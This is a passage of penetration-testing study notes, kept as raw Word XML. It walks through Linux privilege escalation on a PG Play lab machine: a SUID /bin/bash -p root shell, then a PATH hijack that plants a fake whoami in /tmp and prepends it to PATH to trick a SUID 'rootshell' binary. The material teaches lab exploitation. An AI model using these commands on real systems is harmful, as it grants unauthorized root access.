    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002642">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>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./RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002643">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And it should print "done" showing that it worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002644">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And then open /bin/bash now that it has SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002645">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>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-p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264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2648">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002649">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1mr25cl151n8" w:id="339"/>
      <w:bookmarkEnd w:id="339"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One example with root cron job calling whoami without full path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId807">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Inclusiveness</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw a C script (on target machine) that runs the "whoami" command and if it returns "tom," then it will open a shell as root since the SUID of the executable is set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the process:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Upon checking the/home/tom directory, I found an interesting file rootshell.c file and a compile file rootshell that owns SUID permissions.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002650">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2260600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="301" name="image295.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image295.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80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2651">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002652">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3795615" cy="3576638"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="257" name="image264.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image264.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId809"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3795615" cy="3576638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002653">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">popen("whoami", "r")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs the whoami command and opens a pipe to read its output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002654">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fgets(user, 80, f) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reads the output (e.g., "tom\n") into the user buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002655">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strncmp(user, "tom", 3)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks if the output starts with "tom".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002656">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the user is "tom":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002657">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(geteuid())</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: sets real UID to effective UID (usually root if SUID-bit is set and the file is owned by root).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002658">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execlp("sh", "sh", (char *)0)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: launches a shell (sh) with those privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002659">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this binary is owned by root and has the SUID bit set, then any code inside it (after calling setuid(geteuid())) executes with root privileges, since SUID allows you to run files with the permissions of the owner of the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The critical issue is here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">popen("whoami", "r");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It does not use the full path (/usr/bin/whoami). It just calls whoami, which means it relies on the system's PATH to find the executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002660">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002661">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And importantly, if you check with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type -a whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you see no mentions of shell built-in, meaning that it depends on PATH to find binary. If it said "shell builtin" then that means it doesn't depend on PATH and is not hijackable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002662">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002663">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if an attacker can control the PATH, they can trick the program into running a malicious version of whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002664">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002665">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002666">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Create a fake whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002667">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002668">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'echo tom' &gt; /tmp/whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002669">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now /tmp/whoami is an executable that simply prints "tom", tricking the program into thinking you're user tom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Prepend /tmp to PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=/tmp:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002670">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means when the program calls whoami, it looks in /tmp first and runs your script instead of the real /usr/bin/whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002671">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002672">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Execute the vulnerable binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002674">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002675">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If rootshell has the SUID bit set and is owned by root, you'll now get a root shell, because:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002676">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your fake whoami prints "tom"</w:t>
      </w:r>
    </w:p>
